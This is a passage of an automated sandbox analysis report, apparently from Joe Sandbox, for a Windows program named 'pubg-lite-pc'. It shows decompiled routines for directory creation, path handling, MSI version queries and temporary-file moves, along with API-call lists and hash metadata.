												 *_t387 =  *((intOrPtr*)( *_t306 + 0xc))() + 0x10;
												_v12 = 1;
												_t187 = L6D967E50(_t387, _t356, _t401);
												__eflags = _t187;
												if(_t187 == 0) {
													_t312 = _t401;
													_t357 = _t312 + 2;
													do {
														_t188 =  *_t312;
														_t312 = _t312 + 2;
														__eflags = _t188;
													} while (_t188 != 0);
													__eflags = _t312 - _t357;
													L6D9666D0(_t298, _t387, _t378, _t387, _t401, _t312 - _t357 >> 1);
												}
												L67:
												_v12 = 0;
												_v24 = 1;
												 *[fs:0x0] = _v20;
												__eflags = _a512 ^ _t401;
												return L6D98A13F(_a512 ^ _t401);
											}
										}
									} else {
										L6D966270(_t298, _t378, _t386, _v48);
										_v12 = 1;
										_t378 = 0;
										_t192 = _v44;
										_t298 = _t298 | 0xffffffff;
										_v36 = _t192;
										_t103 = 1 + _t378; // 0x1
										_t386 = _t103;
										__eflags = _t192 - _t386;
										if(_t192 <= _t386) {
											L54:
											__eflags = _t378 - 0xb7;
											_t392 =  !=  ? _t378 : 0;
											_v12 = 0;
											_t194 = _v32 + 0xfffffff0;
											asm("lock xadd [eax+0xc], ebx");
											__eflags = _t298 - 1;
											if(_t298 - 1 <= 0) {
												 *((intOrPtr*)( *((intOrPtr*)( *_t194)) + 4))(_t194);
											}
											_v12 = 0xffffffff;
											L6D96FB20();
											 *[fs:0x0] = _v20;
											return _t392;
										} else {
											while(1) {
												L6D966270(_t298, _t378, _t386,  &_v32);
												_v12 = 2;
												_t305 =  &_v28;
												_t167 = L6D966370(_t298, _t305, "\\", 1);
												__eflags = _t386 - _v44;
												if(_t386 >= _v44) {
													goto L57;
												}
												L6D966370(_t298,  &_v28,  *((intOrPtr*)(_v48 + _t386 * 4)),  *((intOrPtr*)( *((intOrPtr*)(_v48 + _t386 * 4)) - 0xc)));
												_t203 = CreateDirectoryW(_v28, 0); // executed
												__eflags = _t203;
												if(_t203 != 0) {
													L45:
													_t305 =  &_v32;
													_t167 = L6D966370(_t298, _t305, "\\", 1);
													__eflags = _t386 - _v44;
													if(_t386 >= _v44) {
														goto L57;
													} else {
														L6D966370(_t298,  &_v32,  *((intOrPtr*)(_v48 + _t386 * 4)),  *((intOrPtr*)( *((intOrPtr*)(_v48 + _t386 * 4)) - 0xc)));
														_v12 = 1;
														_t356 =  &(_v28[0xfffffffffffffff8]);
														asm("lock xadd [edx+0xc], eax");
														__eflags = _t298 - 1;
														if(_t298 - 1 <= 0) {
															 *((intOrPtr*)( *((intOrPtr*)( *_t356)) + 4))(_t356);
														}
														_t386 = 1 + _t386;
														__eflags = _t386 - _v36;
														if(_t386 < _v36) {
															continue;
														} else {
															goto L54;
														}
													}
												} else {
													_t378 = GetLastError();
													__eflags = _t378 - 0xb7;
													if(_t378 == 0xb7) {
														goto L45;
													} else {
														__eflags = _v21;
														if(_v21 == 0) {
															__eflags = _t386 - 1;
															if(_t386 > 1) {
																E6D982BF0(_t356, _t378, _t386);
															}
															_v12 = 1;
															_t361 =  &(_v28[0xfffffffffffffff8]);
															asm("lock xadd [edx+0xc], eax");
															__eflags = _t298 - 1;
															if(_t298 - 1 <= 0) {
																 *((intOrPtr*)( *( *_t361) + 4))(_t361);
															}
															goto L54;
														} else {
															goto L45;
														}
													}
												}
												goto L71;
											}
											goto L57;
										}
									}
								} else {
									__eflags = 0;
									 *[fs:0x0] = _v20;
									return 0;
								}
							}
						} else {
							L6D9765F0(_t298,  &_v36, _t381, _t385, _t430);
							_v8 = 0xa;
							L6D983630(_v32,  &_v20,  &_v36);
							_v8 = 3;
							_t372 = _v36 + 0xfffffff0;
							asm("lock xadd [edx+0xc], eax");
							if(_t298 - 1 <= 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t372)) + 4))(_t372);
							}
							L29:
							_v8 = 1;
							_t396 = _t385 + 0xfffffff0;
							asm("lock xadd [esi+0xc], eax");
							_t247 = _t298 - 1;
							if(_t247 <= 0) {
								_t247 =  *((intOrPtr*)( *((intOrPtr*)( *_t396)) + 4))(_t396);
							}
							_v8 = 0xffffffff;
							_t369 =  &(_v20[0xfffffffffffffff8]);
							asm("lock xadd [edx+0xc], ebx");
							if(_t298 - 1 <= 0) {
								_t247 =  *((intOrPtr*)( *( *_t369) + 4))(_t369);
							}
							 *[fs:0x0] = _v16;
							return _t247;
						}
					}
				}
				L71:
			}










































































                                                                                                0x6d982ee0
                                                                                                0x6d982ee0
                                                                                                0x6d982ee1
                                                                                                0x6d982ee3
                                                                                                0x6d982ee5
                                                                                                0x6d982ef0
                                                                                                0x6d982ef1
                                                                                                0x6d982ef4
                                                                                                0x6d982ef5
                                                                                                0x6d982ef6
                                                                                                0x6d982ef7
                                                                                                0x6d982efe
                                                                                                0x6d982f02
                                                                                                0x6d982f08
                                                                                                0x6d982f0a
                                                                                                0x6d982f0d
                                                                                                0x6d982f14
                                                                                                0x6d982f1b
                                                                                                0x6d98322c
                                                                                                0x6d983231
                                                                                                0x00000000
                                                                                                0x6d982f21
                                                                                                0x6d982f21
                                                                                                0x6d982f23
                                                                                                0x6d982f2b
                                                                                                0x6d982f2e
                                                                                                0x6d982f35
                                                                                                0x6d982f3c
                                                                                                0x00000000
                                                                                                0x6d982f42
                                                                                                0x6d982f4c
                                                                                                0x6d982f4f
                                                                                                0x6d982f53
                                                                                                0x6d982f55
                                                                                                0x6d982f5a
                                                                                                0x6d982f5f
                                                                                                0x6d983064
                                                                                                0x6d983067
                                                                                                0x6d982f65
                                                                                                0x6d982f65
                                                                                                0x6d982f6b
                                                                                                0x6d982ff7
                                                                                                0x6d982ff7
                                                                                                0x6d983005
                                                                                                0x6d98300c
                                                                                                0x6d983015
                                                                                                0x6d98301c
                                                                                                0x6d983026
                                                                                                0x6d98302c
                                                                                                0x6d98302f
                                                                                                0x6d983038
                                                                                                0x6d98303b
                                                                                                0x6d983041
                                                                                                0x6d983043
                                                                                                0x6d98304a
                                                                                                0x6d98304a
                                                                                                0x6d983059
                                                                                                0x6d98305c
                                                                                                0x6d982f71
                                                                                                0x6d982f71
                                                                                                0x6d982f76
                                                                                                0x6d982f77
                                                                                                0x6d982f7c
                                                                                                0x6d982f81
                                                                                                0x00000000
                                                                                                0x6d982f8b
                                                                                                0x6d982f8b
                                                                                                0x6d982f99
                                                                                                0x6d982fa0
                                                                                                0x6d982fa9
                                                                                                0x6d982fb0
                                                                                                0x6d982fba
                                                                                                0x6d982fc0
                                                                                                0x6d982fc3
                                                                                                0x6d982fcc
                                                                                                0x6d982fcf
                                                                                                0x6d982fd7
                                                                                                0x6d982fde
                                                                                                0x6d982fde
                                                                                                0x6d982fed
                                                                                                0x6d982ff0
                                                                                                0x6d982ff0
                                                                                                0x6d982f81
                                                                                                0x6d982f6b
                                                                                                0x6d98306c
                                                                                                0x6d983070
                                                                                                0x6d983079
                                                                                                0x6d98307e
                                                                                                0x6d983084
                                                                                                0x6d9830a0
                                                                                                0x6d9830a0
                                                                                                0x6d983086
                                                                                                0x6d983089
                                                                                                0x6d98308b
                                                                                                0x6d983091
                                                                                                0x6d983093
                                                                                                0x6d983098
                                                                                                0x00000000
                                                                                                0x6d98309a
                                                                                                0x6d98309a
                                                                                                0x6d98309c
                                                                                                0x6d98309e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d98309e
                                                                                                0x6d983098
                                                                                                0x6d9830a3
                                                                                                0x6d9830ad
                                                                                                0x6d9830b2
                                                                                                0x6d9830b6
                                                                                                0x6d9830bf
                                                                                                0x6d9830c4
                                                                                                0x6d9830cd
                                                                                                0x6d9830d0
                                                                                                0x6d9830d8
                                                                                                0x6d9830da
                                                                                                0x6d9830df
                                                                                                0x6d9830df
                                                                                                0x6d9830e5
                                                                                                0x6d9830e6
                                                                                                0x6d9830ea
                                                                                                0x6d9830ef
                                                                                                0x6d9830f2
                                                                                                0x6d9830f6
                                                                                                0x6d983140
                                                                                                0x6d983147
                                                                                                0x6d98314e
                                                                                                0x6d983155
                                                                                                0x6d98315f
                                                                                                0x6d983164
                                                                                                0x6d983172
                                                                                                0x6d983177
                                                                                                0x6d98317a
                                                                                                0x6d983183
                                                                                                0x6d983186
                                                                                                0x6d98318c
                                                                                                0x6d98318e
                                                                                                0x6d983195
                                                                                                0x6d983195
                                                                                                0x6d98319f
                                                                                                0x6d9831a4
                                                                                                0x6d9831a7
                                                                                                0x6d9831a9
                                                                                                0x6d9831ab
                                                                                                0x6d9831ae
                                                                                                0x6d9831b0
                                                                                                0x6d9831d4
                                                                                                0x6d9831d4
                                                                                                0x6d9831db
                                                                                                0x00000000
                                                                                                0x6d9831b2
                                                                                                0x6d9831b2
                                                                                                0x6d9831b2
                                                                                                0x6d9831b4
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d9831bd
                                                                                                0x6d9831c4
                                                                                                0x6d9831c9
                                                                                                0x6d9831ca
                                                                                                0x6d9831cd
                                                                                                0x00000000
                                                                                                0x6d9831cf
                                                                                                0x6d9831cf
                                                                                                0x00000000
                                                                                                0x6d9831cf
                                                                                                0x00000000
                                                                                                0x6d9831cd
                                                                                                0x6d983236
                                                                                                0x6d98323d
                                                                                                0x6d983242
                                                                                                0x6d983243
                                                                                                0x6d983244
                                                                                                0x6d983245
                                                                                                0x6d983246
                                                                                                0x6d983247
                                                                                                0x6d983248
                                                                                                0x6d983249
                                                                                                0x6d98324a
                                                                                                0x6d98324b
                                                                                                0x6d98324c
                                                                                                0x6d98324d
                                                                                                0x6d98324e
                                                                                                0x6d98324f
                                                                                                0x6d983250
                                                                                                0x6d983251
                                                                                                0x6d983253
                                                                                                0x6d983255
                                                                                                0x6d983260
                                                                                                0x6d983264
                                                                                                0x6d983265
                                                                                                0x6d983266
                                                                                                0x6d983267
                                                                                                0x6d98326e
                                                                                                0x6d983272
                                                                                                0x6d983278
                                                                                                0x6d98327a
                                                                                                0x6d98327f
                                                                                                0x6d983281
                                                                                                0x6d98329f
                                                                                                0x6d9832a2
                                                                                                0x6d9832a9
                                                                                                0x6d9832b0
                                                                                                0x6d9832b4
                                                                                                0x6d9832bb
                                                                                                0x6d9832c2
                                                                                                0x6d9832c4
                                                                                                0x6d9832c7
                                                                                                0x6d9832cc
                                                                                                0x6d9832d0
                                                                                                0x6d983428
                                                                                                0x6d98342f
                                                                                                0x6d983434
                                                                                                0x6d983435
                                                                                                0x6d983436
                                                                                                0x6d983437
                                                                                                0x6d983438
                                                                                                0x6d983439
                                                                                                0x6d98343a
                                                                                                0x6d98343b
                                                                                                0x6d98343c
                                                                                                0x6d98343d
                                                                                                0x6d98343e
                                                                                                0x6d98343f
                                                                                                0x6d983441
                                                                                                0x6d98345f
                                                                                                0x6d983464
                                                                                                0x6d983466
                                                                                                0x6d983471
                                                                                                0x6d983477
                                                                                                0x6d983479
                                                                                                0x6d983480
                                                                                                0x6d983483
                                                                                                0x6d983489
                                                                                                0x6d983490
                                                                                                0x6d983496
                                                                                                0x6d983498
                                                                                                0x6d9834f2
                                                                                                0x6d9834f4
                                                                                                0x6d9834f6
                                                                                                0x00000000
                                                                                                0x6d9834f8
                                                                                                0x6d9834fd
                                                                                                0x6d9834fd
                                                                                                0x6d983500
                                                                                                0x00000000
                                                                                                0x6d983500
                                                                                                0x6d98349a
                                                                                                0x6d98349f
                                                                                                0x6d9834a1
                                                                                                0x6d9834a3
                                                                                                0x6d983533
                                                                                                0x6d983538
                                                                                                0x6d98353d
                                                                                                0x6d98353e
                                                                                                0x6d98353f
                                                                                                0x6d983540
                                                                                                0x6d983541
                                                                                                0x6d983543
                                                                                                0x6d983546
                                                                                                0x6d983548
                                                                                                0x6d98354b
                                                                                                0x6d983551
                                                                                                0x6d983551
                                                                                                0x6d983559
                                                                                                0x6d9834a9
                                                                                                0x6d9834b1
                                                                                                0x6d9834b3
                                                                                                0x6d9834c0
                                                                                                0x6d9834c5
                                                                                                0x6d9834c7
                                                                                                0x6d9834c9
                                                                                                0x6d9834cc
                                                                                                0x6d9834d0
                                                                                                0x6d9834d0
                                                                                                0x6d9834d3
                                                                                                0x6d9834d6
                                                                                                0x6d9834d6
                                                                                                0x6d9834db
                                                                                                0x6d9834e6
                                                                                                0x6d9834e6
                                                                                                0x6d983502
                                                                                                0x6d983502
                                                                                                0x6d983509
                                                                                                0x6d983515
                                                                                                0x6d983524
                                                                                                0x6d983532
                                                                                                0x6d983532
                                                                                                0x6d9834a3
                                                                                                0x6d9832d6
                                                                                                0x6d9832dc
                                                                                                0x6d9832e1
                                                                                                0x6d9832e5
                                                                                                0x6d9832e7
                                                                                                0x6d9832ea
                                                                                                0x6d9832ed
                                                                                                0x6d9832f0
                                                                                                0x6d9832f0
                                                                                                0x6d9832f3
                                                                                                0x6d9832f5
                                                                                                0x6d9833de
                                                                                                0x6d9833e0
                                                                                                0x6d9833e6
                                                                                                0x6d9833e9
                                                                                                0x6d9833f0
                                                                                                0x6d9833f3
                                                                                                0x6d9833f9
                                                                                                0x6d9833fb
                                                                                                0x6d983402
                                                                                                0x6d983402
                                                                                                0x6d983405
                                                                                                0x6d98340f
                                                                                                0x6d983419
                                                                                                0x6d983427
                                                                                                0x6d983300
                                                                                                0x6d983300
                                                                                                0x6d983307
                                                                                                0x6d98330c
                                                                                                0x6d983310
                                                                                                0x6d98331a
                                                                                                0x6d98331f
                                                                                                0x6d983322
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d983335
                                                                                                0x6d98333f
                                                                                                0x6d983345
                                                                                                0x6d983347
                                                                                                0x6d98335f
                                                                                                0x6d983366
                                                                                                0x6d983369
                                                                                                0x6d98336e
                                                                                                0x6d983371
                                                                                                0x00000000
                                                                                                0x6d983377
                                                                                                0x6d983384
                                                                                                0x6d983389
                                                                                                0x6d983392
                                                                                                0x6d983395
                                                                                                0x6d98339b
                                                                                                0x6d98339d
                                                                                                0x6d9833a4
                                                                                                0x6d9833a4
                                                                                                0x6d9833a7
                                                                                                0x6d9833a8
                                                                                                0x6d9833ab
                                                                                                0x00000000
                                                                                                0x6d9833b1
                                                                                                0x00000000
                                                                                                0x6d9833b1
                                                                                                0x6d9833ab
                                                                                                0x6d983349
                                                                                                0x6d98334f
                                                                                                0x6d983351
                                                                                                0x6d983357
                                                                                                0x00000000
                                                                                                0x6d983359
                                                                                                0x6d983359
                                                                                                0x6d98335d
                                                                                                0x6d9833b3
                                                                                                0x6d9833b6
                                                                                                0x6d9833bb
                                                                                                0x6d9833bb
                                                                                                0x6d9833c0
                                                                                                0x6d9833c9
                                                                                                0x6d9833cc
                                                                                                0x6d9833d2
                                                                                                0x6d9833d4
                                                                                                0x6d9833db
                                                                                                0x6d9833db
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d98335d
                                                                                                0x6d983357
                                                                                                0x00000000
                                                                                                0x6d983347
                                                                                                0x00000000
                                                                                                0x6d983300
                                                                                                0x6d9832f5
                                                                                                0x6d983283
                                                                                                0x6d983283
                                                                                                0x6d983288
                                                                                                0x6d983296
                                                                                                0x6d983296
                                                                                                0x6d983281
                                                                                                0x6d9830f8
                                                                                                0x6d9830fe
                                                                                                0x6d983103
                                                                                                0x6d983111
                                                                                                0x6d983119
                                                                                                0x6d983122
                                                                                                0x6d983125
                                                                                                0x6d98312d
                                                                                                0x6d983138
                                                                                                0x6d983138
                                                                                                0x6d9831e0
                                                                                                0x6d9831e0
                                                                                                0x6d9831e4
                                                                                                0x6d9831e9
                                                                                                0x6d9831ee
                                                                                                0x6d9831f1
                                                                                                0x6d9831f8
                                                                                                0x6d9831f8
                                                                                                0x6d9831fb
                                                                                                0x6d983205
                                                                                                0x6d983208
                                                                                                0x6d983210
                                                                                                0x6d983217
                                                                                                0x6d983217
                                                                                                0x6d98321d
                                                                                                0x6d98322b
                                                                                                0x6d98322b
                                                                                                0x6d9830f6
                                                                                                0x6d982f3c
                                                                                                0x00000000

                                                                                                APIs
                                                                                                  • Part of subcall function 6D966B50: GetProcessHeap.KERNEL32 ref: 6D966BAC
                                                                                                • PathIsUNCW.SHLWAPI(?,?), ref: 6D983070
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66249601423.000000006D941000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D940000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66249463542.000000006D940000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66254569554.000000006D9BB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66256348275.000000006D9E5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66256907548.000000006D9F1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6d940000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: HeapPathProcess
                                                                                                • String ID: \\?\$\\?\UNC\
                                                                                                • API String ID: 300331711-3019864461
                                                                                                • Opcode ID: 92d3d8900a6756ac937f13f06814c1f43e7f8aecd9372719a1ec4a2b58af5222
                                                                                                • Instruction ID: 096bdfdb25702cb4f84d71244f434741a6621744eb1fe6ba0f82b768c76cc49e
                                                                                                • Opcode Fuzzy Hash: 92d3d8900a6756ac937f13f06814c1f43e7f8aecd9372719a1ec4a2b58af5222
                                                                                                • Instruction Fuzzy Hash: 70C1CF7190464A9BDB00CFB8CC84BAEF7B8FF55724F148668E521E7291EB34D904CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009749D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 122libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00974A11
                                                                                                  • Part of subcall function 009292F0: GetProcessHeap.KERNEL32 ref: 00929345
                                                                                                  • Part of subcall function 00935370: FindResourceW.KERNEL32(00000000,?,00000006,?,000000FF,?,009EB3FB,\\.\pipe\ToServer,?,?,?,00000000,00A7C506,000000FF,?,80004005), ref: 00935397
                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000000,-00000010), ref: 00974AE4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: DirectoryFindHeapLibraryLoadProcessResourceSystem
                                                                                                • String ID: Kernel32.dll
                                                                                                • API String ID: 2891229163-1926710522
                                                                                                • Opcode ID: 428f836de2188b5a1aa648d679cc2ce2c60db7d7907881b2c0283606a26a019b
                                                                                                • Instruction ID: ed4e55171b37197440ef00d0839e0f7a23c785a50602ceddc357d56e013093ec
                                                                                                • Opcode Fuzzy Hash: 428f836de2188b5a1aa648d679cc2ce2c60db7d7907881b2c0283606a26a019b
                                                                                                • Instruction Fuzzy Hash: 8941D5366405059BCB18DB68CC55BFF73A8FF44710F14862DE92A9B6C2EBB0AA05CB54
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6D967FC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 37%
                                                                                                			E6D967FC0(void* __ecx, void* __edx, signed int _a4) {
				signed int _v12;
				void* __edi;
				void* __esi;
				signed int* _t19;
				signed int _t22;
				void* _t25;
				signed int* _t35;
				void* _t36;
				signed int _t38;
				void* _t40;

				_t35 = _a4;
				_t25 = __edx;
				_t40 = __ecx;
				L6D98A8DA(_t35[1]);
				_t35[1] = 0;
				_t19 =  &_a4;
				 *_t35 = 0;
				_a4 = 0;
				__imp__#74(__ecx, __edx, 0x6d9c6670, _t19);
				if(_t19 == 0xea) {
					_t38 = _v12 + 1;
					_v12 = _t38;
					_t22 = E6D98A8D1(_t35, _t38, __eflags,  ~(0 | __eflags > 0x00000000) | _t38 * 0x00000002); // executed
					_t35[1] = _t22;
					 *_t35 = _t38;
					__imp__#74(_t40, _t25, _t22,  &_v12, _t36);
					__eflags = _t22;
					_t17 = _t22 == 0;
					__eflags = _t17;
					return _t22 & 0xffffff00 | _t17;
				} else {
					return 0;
				}
			}













                                                                                                0x6d967fc3
                                                                                                0x6d967fc7
                                                                                                0x6d967fc9
                                                                                                0x6d967fce
                                                                                                0x6d967fd6
                                                                                                0x6d967fdd
                                                                                                0x6d967fe1
                                                                                                0x6d967fe7
                                                                                                0x6d967ff7
                                                                                                0x6d968002
                                                                                                0x6d968011
                                                                                                0x6d968019
                                                                                                0x6d968027
                                                                                                0x6d96802f
                                                                                                0x6d968036
                                                                                                0x6d96803c
                                                                                                0x6d968044
                                                                                                0x6d968047
                                                                                                0x6d968047
                                                                                                0x6d96804b
                                                                                                0x6d968006
                                                                                                0x6d968009
                                                                                                0x6d968009

                                                                                                APIs
                                                                                                • #74.MSI(?,ProductVersion,6D9C6670,?), ref: 6D967FF7
                                                                                                • #74.MSI(?,ProductVersion,00000000,?), ref: 6D96803C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66249601423.000000006D941000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D940000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66249463542.000000006D940000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66254569554.000000006D9BB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66256348275.000000006D9E5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66256907548.000000006D9F1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6d940000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ProductVersion
                                                                                                • API String ID: 0-646591648
                                                                                                • Opcode ID: 4ca7c5e24cbb67b0f57647e416241d81b88a15ce4a011799e9cc6927af0a55e5
                                                                                                • Instruction ID: fcd9dbc760f5341e0abb38a92add94bbb0af1d65765127c8db124b5067c6bd34
                                                                                                • Opcode Fuzzy Hash: 4ca7c5e24cbb67b0f57647e416241d81b88a15ce4a011799e9cc6927af0a55e5
                                                                                                • Instruction Fuzzy Hash: 2B017CF2105206AFE7048F14D845B6BB7ACEF95654F10492AF44593281E7B1EC148BB2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00929B90 Relevance: 4.8, APIs: 3, Instructions: 255fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetTempFileNameW.KERNEL32(?,?,00000000,?,F4D3B90A,F4D3B90A,?), ref: 00929C0A
                                                                                                • MoveFileW.KERNEL32(?,00000000), ref: 00929E1B
                                                                                                • DeleteFileW.KERNEL32(?), ref: 00929E65
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$DeleteMoveNameTemp
                                                                                                • String ID:
                                                                                                • API String ID: 788073729-0
                                                                                                • Opcode ID: 99370df2027988c70d3af8acb770a22fdec1c922c90f8f4e21629a89d01974f0
                                                                                                • Instruction ID: bb5a847fedb05b1562050cc02f046898b71648c7c3040d581dce8350ca5ef396
                                                                                                • Opcode Fuzzy Hash: 99370df2027988c70d3af8acb770a22fdec1c922c90f8f4e21629a89d01974f0
                                                                                                • Instruction Fuzzy Hash: 93C16470D19268DACB20DF68CD987DDBBB4AF94304F1042D9E409A7291EB756B88CF91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009CCCB0 Relevance: 4.7, APIs: 3, Instructions: 183fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,F4D3B90A,?,?,?,80004005,?,00000000), ref: 009CCD4E
                                                                                                • GetLastError.KERNEL32(?,?,?,80004005,?,00000000), ref: 009CCD86
                                                                                                • GetLastError.KERNEL32(?,?,?,?,80004005,?,00000000), ref: 009CCE1F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$CreateFile
                                                                                                • String ID:
                                                                                                • API String ID: 1722934493-0
                                                                                                • Opcode ID: c5e7d1ebb9f256ea9cf757d12f09f879b08315a68761ece2bb45581f362ea860
                                                                                                • Instruction ID: dd0e30680ffbc2e19a21188ffbc06530a40a748f9b8777043b3ae2d61627f93b
                                                                                                • Opcode Fuzzy Hash: c5e7d1ebb9f256ea9cf757d12f09f879b08315a68761ece2bb45581f362ea860
                                                                                                • Instruction Fuzzy Hash: 1751C171E006059FCB20DF69D845BAAFBB5FF85320F14862DE51A973E0EB71A901CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009B3A00 Relevance: 4.7, APIs: 3, Instructions: 183COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • PathIsUNCW.SHLWAPI(?,F4D3B90A,00000000,?,-00000010,?,009EFB12,00000000,00000008,F4D3B90A,?,?,?), ref: 009B3A4B
                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00AB07CC,00000001,?), ref: 009B3B02
                                                                                                • GetLastError.KERNEL32 ref: 009B3B10
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateDirectoryErrorLastPath
                                                                                                • String ID:
                                                                                                • API String ID: 953296794-0
                                                                                                • Opcode ID: 06a156b76328323086d70868853484bcc455b6ae0366a2d650db2aff1f4fe3ab
                                                                                                • Instruction ID: dbadeb241f9a52d8496f5a1d3fe57c0fec565960ed560e87d7b1e5cdbfd80ffb
                                                                                                • Opcode Fuzzy Hash: 06a156b76328323086d70868853484bcc455b6ae0366a2d650db2aff1f4fe3ab
                                                                                                • Instruction Fuzzy Hash: FB619E31E006099FDB10DFA8C999BEEFBB4EF59320F248259E415A72D1DB759A04CB50
